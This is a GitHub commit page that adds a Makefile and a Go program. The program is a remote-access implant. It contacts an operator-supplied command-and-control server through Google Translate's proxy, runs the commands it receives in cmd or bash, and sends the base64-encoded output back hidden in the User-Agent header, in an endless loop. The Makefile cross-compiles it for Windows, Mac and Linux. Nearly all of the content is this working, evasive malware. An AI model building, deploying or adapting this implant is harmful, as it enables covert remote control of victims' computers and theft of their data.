-
-
Notifications
You must be signed in to change notification settings - Fork 100
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
a575b19
commit 36bc380
Showing
4 changed files
with
165 additions
and
5 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
build: | ||
mkdir -p `pwd`/bin | ||
GOOS=windows GOARCH=amd64 go build -o `pwd`/bin/client_Windows64.exe client.go | ||
GOOS=windows GOARCH=386 go build -o `pwd`/bin/client_Windows.exe client.go | ||
GOOS=darwin GOARCH=386 go build -o `pwd`/bin/client_Mac client.go | ||
go build -o `pwd`/bin/client_Linux client.go | ||
|
||
clean: | ||
rm -Rf `pwd`/bin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,139 @@ | ||
package main | ||
|
||
import ( | ||
"bytes" | ||
"encoding/base64" | ||
"fmt" | ||
"log" | ||
"net/http" | ||
"os" | ||
"os/exec" | ||
"runtime" | ||
"strings" | ||
"github.com/antchfx/htmlquery" | ||
"golang.org/x/net/html" | ||
"golang.org/x/net/html/charset" | ||
) | ||
|
||
type requestData struct { | ||
url string | ||
userAgent string | ||
method string | ||
} | ||
|
||
var C2URL string | ||
var USERAGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" | ||
var RESULT string | ||
|
||
func xpathParser(html *html.Node, xpath string) string { | ||
a := htmlquery.FindOne(html, xpath) | ||
return htmlquery.InnerText(a) | ||
} | ||
|
||
func Encode(data []byte) string { | ||
return base64.StdEncoding.EncodeToString(data) | ||
} | ||
|
||
func parseCommand(command string) string { | ||
if strings.Contains(command, "STARTCOMMAND") { | ||
startIndex := strings.Index(command, "STARTCOMMAND") | ||
endIndex := strings.Index(command, "ENDCOMMAND") | ||
return command[startIndex+len("STARTCOMMAND") : endIndex] | ||
} else { | ||
return "" | ||
} | ||
} | ||
|
||
func doRequest(request requestData, printar bool) (*html.Node, error) { | ||
client := http.Client{} | ||
req, err := http.NewRequest(request.method, request.url, nil) | ||
req.Header.Add("User-Agent", request.userAgent) | ||
resp, err := client.Do(req) | ||
if err != nil { | ||
return nil, err | ||
} | ||
r, err := charset.NewReader(resp.Body, resp.Header.Get("Content-Type")) | ||
if err != nil { | ||
return nil, err | ||
} | ||
return html.Parse(r) | ||
} | ||
|
||
func interact(request requestData) *html.Node { | ||
resp, err := doRequest(request, false) | ||
if err != nil { | ||
fmt.Println(err) | ||
} | ||
return resp | ||
} | ||
|
||
func translateFlow() string { | ||
return thirdStep(secondStep(firstStep())) | ||
} | ||
|
||
func firstStep() string { | ||
request := requestData{ | ||
url: "https://translate.google.com/translate?&anno=2&u=" + C2URL, | ||
userAgent: USERAGENT, | ||
method: "GET", | ||
} | ||
result := xpathParser(interact(request), "//iframe/@src") | ||
return result | ||
|
||
} | ||
|
||
func secondStep(url string) string { | ||
request := requestData{ | ||
url: url, | ||
userAgent: USERAGENT, | ||
method: "GET", | ||
} | ||
|
||
result := xpathParser(interact(request), "//a/@href") | ||
return result | ||
} | ||
|
||
func thirdStep(url string) string { | ||
var useragent string | ||
if len(RESULT) != 0 { | ||
useragent = RESULT | ||
} else { | ||
useragent = USERAGENT | ||
} | ||
|
||
request := requestData{ | ||
url: url, | ||
userAgent: useragent, | ||
method: "GET", | ||
} | ||
|
||
var b bytes.Buffer | ||
html.Render(&b, interact(request)) | ||
return parseCommand(b.String()) | ||
} | ||
|
||
func execCommand(cmd string) { | ||
var output []byte | ||
if runtime.GOOS == "windows" { | ||
output, _ = exec.Command("cmd", "/c", cmd).Output() | ||
} else { | ||
output, _ = exec.Command("bash", "-c", cmd).Output() | ||
} | ||
|
||
RESULT = USERAGENT + " | " + Encode(output) | ||
translateFlow() | ||
} | ||
|
||
func main() { | ||
args := os.Args | ||
if len(args) < 3 { | ||
log.Fatal("Usage Error\n" + args[0] + " www.c2server.ml secret-key") | ||
} | ||
key := args[2] | ||
C2URL = "http://" + args[1] + "/?key=" + key | ||
for { | ||
execCommand(translateFlow()) | ||
RESULT = "" | ||
} | ||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters